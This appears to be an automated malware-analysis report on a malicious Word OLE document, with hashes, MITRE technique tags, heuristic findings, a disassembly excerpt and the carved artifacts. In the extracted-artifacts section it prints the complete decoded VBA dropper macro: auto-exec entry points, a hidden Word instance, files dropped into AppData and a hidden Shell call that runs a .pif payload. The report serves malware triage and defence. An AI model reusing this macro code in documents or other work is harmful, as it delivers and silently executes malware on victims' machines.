Office (OLE) malware analysis — malicious · 2ad9fd0fd8515e84

MALICIOUS

Office (OLE)

193.5 KB Created: 2016-03-28 10:58:00 Authoring application: Microsoft Office Word First seen: 2017-10-10

MD5: a60de35485610cd813f2685d338eea36 SHA-1: 8588227d7f376625ac6506dc60961cc93c7ee8e7 SHA-256: 2ad9fd0fd8515e84c24be565577c30d40cf8ae8635d431e2e9f5bcb49911586b

734 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1137.001 Office Application Startup: Office Application T1137.002 Office Application Startup: Malicious File T1566.001 Spearphishing Attachment: Phishing via Service T1027 Obfuscated Files or Information T1105 Ingress Tool Transfer

The sample is a malicious OLE document containing obfuscated VBA macros. The macros utilize `CreateObject` and `Shell` calls to drop and execute an embedded PE file named 'embedded_office_0000984e.exe'. The VBA code also attempts to establish persistence by writing to the registry key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy' and creates temporary files in the user's AppData\Roaming directory, such as 'C:\Users\<user>\AppData\Roaming\nfbd.pif' and 'C:\Users\<user>\AppData\Roaming\st3.pif'. The presence of an embedded executable and the use of obfuscated VBA point to a downloader or dropper functionality.

Heuristics 19

OLE with Ole10Native — possible CVE-2026-21514 exploitation high CVE likely CVE_2026_21514

Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
ClamAV: BC.Win.Packer.Troll-14 critical CLAMAV_DETECTION

ClamAV detected this file as malware: BC.Win.Packer.Troll-14

XOR-encoded strings (key 0x1D) critical SC_XOR_ENCODED

Found 8 Windows library/API name(s) XOR-encoded with single-byte key 0x1D: 'kernel32.dll', 'advapi32.dll', 'wininet.dll', 'shell32.dll', 'shell32.dll', 'shlwapi.dll', 'LoadLibraryA', 'GetProcAddress'

Disassembly

Attempted x86 opcode disassembly

00028769  7678              jbe 0x287e3
0002876B  6f                outsd dx, dword ptr [esi]
0002876C  7378              jae 0x287e6
0002876E  712e              jno 0x2879e
00028770  2f                das
00028771  337971            xor edi, dword ptr [ecx + 0x71]
00028774  711d              jno 0x28793
00028776  1d301d527f        sbb eax, 0x7f521d30
0002877B  697c7473486e786f  imul edi, dword ptr [esp + esi*2 + 0x73], 0x6f786e48
00028783  5c                pop esp
00028784  7a78              jp 0x287fe
00028786  7369              jae 0x287f1
00028788  4e                dec esi
00028789  696f74737a1d68    imul ebp, dword ptr [edi + 0x74], 0x681d7a73
00028790  6f                outsd dx, dword ptr [esi]
00028791  7170              jno 0x28803
00028793  7273              jb 0x28808
00028795  337971            xor edi, dword ptr [ecx + 0x71]
00028798  711d              jno 0x287b7
0002879A  1d501d5172        sbb eax, 0x72511d50
0002879F  7c79              jl 0x2881a
000287A1  48                dec eax
000287A2  6e                outsb dx, byte ptr [esi]
000287A3  786f              js 0x28814
000287A5  4d                dec ebp
000287A6  6f                outsd dx, dword ptr [esi]
000287A7  727b              jb 0x28824
000287A9  7471              je 0x2881c
000287AB  785c              js 0x28809
000287AD  1d1d7c1d48        sbb eax, 0x481d7c1d
000287B2  7371              jae 0x28825
000287B4  727c              jb 0x28832
000287B6  7948              jns 0x28800
000287B8  6e                outsb dx, byte ptr [esi]
000287B9  786f              js 0x2882a
000287BB  4d                dec ebp
000287BC  6f                outsd dx, dword ptr [esi]
000287BD  727b              jb 0x2883a
000287BF  7471              je 0x28832
000287C1  781d              js 0x287e0
000287C3  686e786f78        push 0x786f786e
000287C8  73                .byte 0x73

Embedded PE executable critical OLE_EMBEDDED_EXE

MZ/PE header found inside document — possible embedded executable
Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE

OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
VBA macros detected medium 8 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Dim wep As Variant
wep = Shell(jrb, 0)
End Function
```
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
VBJASD = "lakjdklashdbjkasn"
Set bhGdggwSw = CreateObject(YhhrJne(20 + 67) & "ord" + ".Applicatio" + "n")
bhGdggwSw.Visible = nnff
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

VBJASD = "lakjdklashdbjkasn"
Set bhGdggwSw = CreateObject(YhhrJne(20 + 67) & "ord" + ".Applicatio" + "n")
bhGdggwSw.Visible = nnff

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Sub
Sub AutoOpen()
    BCHJASD = "1';23l'1p2l32 s"
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
End Function
Sub Workbook_Open()
    Rewew
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub Auto_Open()
    Rewew
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
KKLOR = YhhrJne(3 + 90 + wpp)
OOKRR = Environ$(VGDHE) + KKLOR
DDVD = "" & "." & ""
```
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Reference to GetProcAddress API high SC_STR_GETPROCADDRESS

Reference to GetProcAddress API
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2072 bytes
SHA-256: `2aa79214926d6edb79ee9c3d18c57c6efc0c2c864c67bba2a3aa349a014c12ea`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Loie() Rewew End Sub Sub Rewew() Dim nnff As Boolean, wpp As Integer, FJSAD As String wpp = 7 - 8 VGDHE = UHbdd() VGDHE = VGDHE & "P" nnff = False On Error Resume Next Dim WOIEW As String KKLOR = YhhrJne(3 + 90 + wpp) OOKRR = Environ$(VGDHE) + KKLOR DDVD = "" & "." & "" GGIIR = DDVD + "p" GGIIR = GGIIR & "i" & "f" DEIBE = DDVD & "rt" & YhhrJne(99 + 3) FFFNNNF = OOKRR + "nfbd" + DEIBE SSHHDD = OOKRR & "dsss" + DEIBE WOIEW = OOKRR + "st3" & GGIIR Module1.HNbfw (FFFNNNF) Module1.HNbfw (SSHHDD) Module1.Nnfhhe RLKDWD = Environ$(VGDHE) & "\nfbd" & ".rt" & "f" VBJASD = "lakjdklashdbjkasn" Set bhGdggwSw = CreateObject(YhhrJne(20 + 67) & "ord" + ".Applicatio" + "n") bhGdggwSw.Visible = nnff bhGdggwSw.Documents.Open (RLKDWD) Module1.Polkd (2) HYUASGD = Module1.Pjndw(WOIEW) Module1.Polkd (3) bhGdggwSw.Quit Set bhGdggwSw = Nothing End Sub Public Function YhhrJne(wbrw As Integer) YhhrJne = Chr(wbrw) End Function Public Function UHbdd() UHbdd = "T" & "EM" End Function Sub Workbook_Open() Rewew End Sub Sub AutoOpen() BCHJASD = "1';23l'1p2l32 s" Loie End Sub Sub Auto_Open() Rewew End Sub Attribute VB_Name = "Module1" Sub Polkd(Jbse As Long) poew = 50 Dim Nejw As Long Dim Tgve As Long Tgve = Jbse + Timer Nejw = Tgve Do While Timer < Nejw DoEvents Loop End Sub Public Function Pjndw(jrb As String) Dim wep As Variant wep = Shell(jrb, 0) End Function Sub Nnfhhe() HVYUWEQ = "qiwoudbqiow dqgjqjwhd" HVYUWEQ = "qiwoudbqiow dqgjqjwhd" Polkd (2) HVYUWEQ = "qiwoudbqiow dqgjqjwhd" End Sub Public Function HNbfw(kjrj As String) ActiveDocument.SaveAs FileName:=kjrj, FileFormat:=wdFormatRTF End Function
`embedded_office_0000984e.exe`	embedded-pe	Office MZ+PE at offset 0x984E	159156 bytes
SHA-256: `f814f3715b8b9d56109c84fdbd0aa9ccac71b67d8529e356efdebd016735cb38`
Detection ClamAV: BC.Win.Packer.Troll-14 Obfuscation or payload: likely Carved macro source contains an auto-exec entry point and execution/download terms.
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1520687190/Ole10Native	135372 bytes
SHA-256: `e24724b7622377419408982a02a5ae920abe1ab21b0d7e23ae54a76b48c36091`
Detection ClamAV: BC.Win.Packer.Troll-14 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.